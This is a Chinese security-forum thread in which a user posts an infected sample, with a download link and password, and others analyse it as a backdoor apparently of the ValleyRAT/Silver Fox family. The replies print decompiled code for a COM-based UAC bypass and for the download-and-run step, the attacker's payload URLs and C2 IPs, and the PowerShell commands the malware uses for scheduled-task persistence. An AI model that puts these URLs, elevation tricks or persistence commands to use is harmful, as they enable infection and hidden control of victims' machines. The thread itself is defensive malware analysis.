后门病毒 Vmware-vm \Kcinst.exe

yy7601190 · 发表于 2025-4-2 00:59

本人电脑近期感染病毒，经火绒杀毒软件检测确认。

已采取火绒杀毒软件多次查杀、手动删除可疑文件及更新系统和软件等措施

现将加密压缩后的病毒样本（密码：52pojie）及火绒杀毒检测截图附上样本下载地址：

https://wwxz.lanzn.com/iMkRh2sei5be 。

恳请专业人士协助分析病毒特性、传播途径，并提供有效的清除方案及预防建议

爱飞的猫 · 发表于 2025-4-2 06:51

本帖最后由爱飞的猫于 2025-4-2 07:00 编辑

杀毒软件不应该查不出啊…

利用 explorer COM 接口提权执行可执行文件，字符串都没加密，杀毒软件理应能根据特征或行为查杀：

wcscpy(pszName, L"Elevation:Administrator!new:");
wcscpy(v3, L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}");

直接将 exe 放到在线沙盒运行，未能观测到下载请求，怀疑有检测。

直接静态分析，在 WinMain 结尾的地方可以看到下载文件并执行的代码：

      sub_140031A50();                          // anti vm? via WMI query
      GetTempPathW(0x104u, temp_path);
      SetCurrentDirectoryW(temp_path);
      str_set_1400045C0((__int64)&base_url, (__int64)"http://154.82.68.157:810/b2ca73d9752327bd/");
      str_set_1400045C0((__int64)exe_1, (__int64)"iLauncher.exe");
      url1 = concat_string_140014D40(url_exe, &base_url, exe_1);
      download_140031ED0((__int64)url1, exe_1);
      str_free((__int64)url_exe);
      str_set_1400045C0((__int64)exe_2, (__int64)"infoflow.exe");
      url2 = concat_string_140014D40(url_exe, &base_url, exe_2);
      download_140031ED0((__int64)url2, exe_2);
      str_free((__int64)url_exe);
      Sleep(3000u);
      uuac();                                   // execute as admin (iLauncher.exe)

其中 sub_140031A50 应该是检测虚拟机/沙盒，没细看。拿 WMI 查系统信息。

之后的流程就是下载两个 EXE 文件到 TEMP 目录，并执行 iLauncher.exe：

http://154.82.68.157:810/b2ca73d9752327bd/iLauncher.exe
http://154.82.68.157:810/b2ca73d9752327bd/infoflow.exe

其中 iLauncher.exe 有合法数字签名，签名主体是 Beijing Baidu Netcom Science and Technology Co.,Ltd，怀疑是白+黑。会间接执行命令 infoflow.exe install。

把两个可执行文件放到沙盒用管理员权限执行 iLauncher.exe 就可以观察后续了，沙盒自动打上两个 RAT 远控标记：valleyrat 和 silverfox (银狐)。我对这些家族不清楚，就此略过。

安装完毕后安装计划任务 StateRepositorys，设置开机自启，并启动：

powershell.exe -NoProfile -Command "$taskName = 'StateRepositorys'; $programPath = 'C:\Program Files (x86)\vmware-vm\kcinst.exe'; $description = 'Enable StateRepositorys license acquisition'; $action = New-ScheduledTaskAction -Execute $programPath; $trigger = New-ScheduledTaskTrigger -AtLogOn; $currentUserName = [Environment]::UserName; $principal = New-ScheduledTaskPrincipal -UserId $currentUserName -LogonType Interactive -RunLevel Highest; $settings = New-ScheduledTaskSettingsSet -MultipleInstances Parallel; Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -Principal $principal -Settings $settings -Description $description"
powershell.exe -NoProfile -Command "Start-ScheduledTask -TaskName 'StateRepositorys'"
powershell.exe -NoProfile -Command Enable-WindowsOptionalFeature -Online -FeatureName VirtualMachinePlatform -All

观察计划任务可以看到 StateRepositorys 任务：

KcInst.exe 又是一个白加黑。exe 本体有合法签名，签名主体是 KYOCERA Document Solutions Inc.。

kcinst32.dll 和 sqlite3.dll 都没有数字签名，怀疑前者被替换了。我没看。

连接记录查询 KcInst.exe，可以发现程序向下述 IP 进行加密通信：

27.50.63.2
27.124.42.146

预防建议：

放沙盒或虚拟机跑一跑。如果有比较明显的沙盒/虚拟机检测（如不让执行，或无反应），删掉。
看可执行文件的属性，是否与预期一致。主楼的 EXE 查看详细信息写的是 “A minimalist novel reader”，即开源项目 binbyu/Reader。
- 虽然这个也可以伪造，不能说一致就代表没有魔改。
如果不确认来源是否安全，放虚拟机里跑。

dork · 发表于 2025-4-2 09:47

wcscpy(v3, L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}");银狐类的常用技俩，都可以当特征码用了

zhiyuckt · 发表于 2025-4-2 10:06

爱飞的猫发表于 2025-4-2 06:51
[md]杀毒软件不应该查不出啊…

利用 explorer COM 接口提权执行可执行文件，字符串都没加密，杀毒软件 ...

师傅截图的沙箱环境是自己搭建的吗？如果是平台能说下名字不谢谢

Jx29 · 发表于 2025-4-2 10:13

zhiyuckt 发表于 2025-4-2 10:06
师傅截图的沙箱环境是自己搭建的吗？如果是平台能说下名字不谢谢

看水印是any run沙箱，现在好像不给注册了

zhiyuckt · 发表于 2025-4-2 10:18

Jx29 发表于 2025-4-2 10:13
看水印是any run沙箱，现在好像不给注册了

刚搜了下应该就是这个沙箱，如不给注册就很可惜，貌似能操作的沙箱基本没看到，qax那个好像也只能简单看看

Jx29 · 发表于 2025-4-2 10:30

zhiyuckt 发表于 2025-4-2 10:18
刚搜了下应该就是这个沙箱，如不给注册就很可惜，貌似能操作的沙箱基本没看到，qax那个好像也只能简单看 ...

注册要企业邮箱

，上次试了好多邮箱都不行

你好，再见 · 发表于 2025-4-2 10:31

爱飞的猫发表于 2025-4-2 06:51
[md]杀毒软件不应该查不出啊…

利用 explorer COM 接口提权执行可执行文件，字符串都没加密，杀毒软件 ...

沙箱是不是都不开DirectWrite

muyazhang · 发表于 2025-4-2 11:58

本人门外汉进来仰望各路大神。

爱飞的猫 · 发表于 2025-4-2 23:16

你好，再见发表于 2025-4-2 10:31
沙箱是不是都不开DirectWrite

不清楚，我也没细看它的检测

帐号		自动登录	找回密码
密码			注册[Register]

后门病毒 Vmware-vm \Kcinst.exe

免费评分

点评